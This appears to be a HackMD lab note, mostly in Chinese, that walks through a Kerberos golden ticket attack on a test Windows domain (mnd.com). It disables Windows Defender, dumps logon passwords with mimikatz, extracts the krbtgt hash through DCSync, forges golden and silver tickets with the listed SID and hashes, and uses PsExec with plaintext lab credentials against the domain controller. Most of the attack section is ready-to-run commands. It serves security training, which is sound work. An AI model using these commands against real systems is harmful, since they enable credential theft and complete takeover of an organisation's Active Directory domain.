Golden Ticket - HackMD

Golden Ticket === ## Download - [Windows Server 2016](https://mega.nz/#!8ER1lLgb!9EvVXNKHeRUUbkxdEfrwpzqgZbyv0zOsv-uqqRaL2zM ) - [mimikatz_trunk2.2.1.zip](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip) - [PSTools.zip](https://docs.microsoft.com/en-us/sysinternals/downloads/pstools) ## Setting Document 1. Close Windows Defender on Server site 2. Install DNS & DHCP Service on Server site 3. DNS -> 新增樹系 mnd.com -> 1231qaz@WSX ->... 4. 在client端->識別...->(https://portal2.ntua.edu.tw/cc/web_doc/form/4_equipment/win10.pdf) 5. net view錯誤-> - 6118錯誤解決方案 :::warning 在伺服器端右鍵單擊“我的電腦”，進入“管理”>“服務”，啟動“Computer Brower”服務，若無法啟動，請確認“Server”和“WorkStation”兩項服務已開啟，並設置“Computer Brower”服務屬性為“手動啟動”。 ::: - 1231錯誤解決方案 :::warning 在Client端 ![](https://i.imgur.com/tlFuQIQ.png) ::: 6. close defender on client site 7. download [mimikatz](https://github.com/gentilkiwi/mimikatz) on client site 8. sekurlsa::logonpassword錯誤-> - [ERROR kuhl_m_sekurlsa_acquireLSA ; Key import](https://www.jianshu.com/p/a8fbd557b627) 解決方案 :::warning 下載mimikatz 2.1.1 for Win 10 1809-1803 [mimikatz_trunk.zip](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip) ::: 10. 執行 ```shell= .\mimikatz log "lsadump::dcsync /domain:mnd.com /user:krbtgt" .\mimikatz "kerberos::golden /domain:mnd.com /sid:S-1-5-21-762870798-4199311121-3917955505 /aes256:7af9c54790ea2fad620e5a526babf8672b3df678397a76c22ded1981306df634 /user:krbtgt /ticket:gold" #ctrl+c dir \\WIN-1KA8HNASEGB.mnd.com\c$ psexec.exe... ``` ## hack process 1. ~~任意方式打下win10~~ 2. ~~利用漏洞提權~~ 3. 在利用win10的本機帳號以管理員權限執行`cmd.exe` 4. 執行指令`C:\Users\sean\Desktop\mimikatz_trunk\x64\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"`，取得AD其中一個帳號`MND\andy 1qaz@WSX`和本機`.\sean sean`的帳號與兩個帳號對應的密碼雜湊 5. 登入取得的AD帳號(andy)，利用本機具管理權限的帳號(sean)開啟`cmd.exe` 6. 在`cmd.exe`中執行指令 ```shell= cd C:\Users\andy\Desktop\mimikatz_trunk\x64 ``` ```shell= .\PsExec.exe -u MND\sean -p 1qaz@WSX3edc \\WIN-1KA8HNASEGB -i -d "cmd.exe" "/c ipconfig> C:\Users\sean\Desktop\ip.txt" ``` ## story 登入Win0後發現桌面有mimikatz與駭客留下的silver ticket，裡面有krbtgt的資訊，隨後利用其中參數與mimikatz生成golden ticket，最後以ticket登入AD ## refer https://wooyun.js.org/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.html https://blog.csdn.net/Captain_RB/article/details/107883264 - 生成silver ticket(ldap) ``` .\mimikatz.exe log "kerberos::golden /domain:mnd.com /sid:S-1-5-21-762870798-4199311121-3917955505 /target:WIN-1KA8HNASEGB.mnd.com /service:ldap /rc4:c24beca7814e0941d2176c7968493558 /user:silver /ticket:silver_ldap" ```